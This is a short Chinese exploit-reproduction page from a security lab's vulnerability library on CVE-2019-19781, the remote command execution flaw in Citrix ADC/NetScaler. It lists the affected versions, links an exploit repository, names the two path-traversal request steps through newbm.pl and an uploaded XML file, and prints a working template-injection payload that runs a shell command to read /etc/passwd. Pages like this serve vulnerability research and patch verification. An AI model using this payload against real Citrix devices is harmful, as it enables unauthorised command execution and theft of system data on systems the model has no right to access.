CVE-2019-19781 Citrix ADC&NetScaler 远程命令执行漏洞-漏洞文库小世界-安全文库-NGC660安全实验室

CVE-2019-19781 Citrix ADC&NetScaler 远程命令执行漏洞

CVE-2019-19781 Citrix ADC&NetScaler 远程命令执行漏洞

漏洞影响

13.x,12.1,12.0,11.1,10.5

复现过程

https://github.com/ianxtianxt/CVE-2019-19781

0x01

upload_xml (/vpn/../vpns/portal/scripts/newbm.pl)

0x02

Execute Command (/vpn/../vpns/portal/jas502n.xml)

Payload:

url=http://example.com&title=c&desc=[% http://template.new('BLOCK' = 'print `cat /etc/passwd`') %]
请登录后发表评论

    请登录后查看回复内容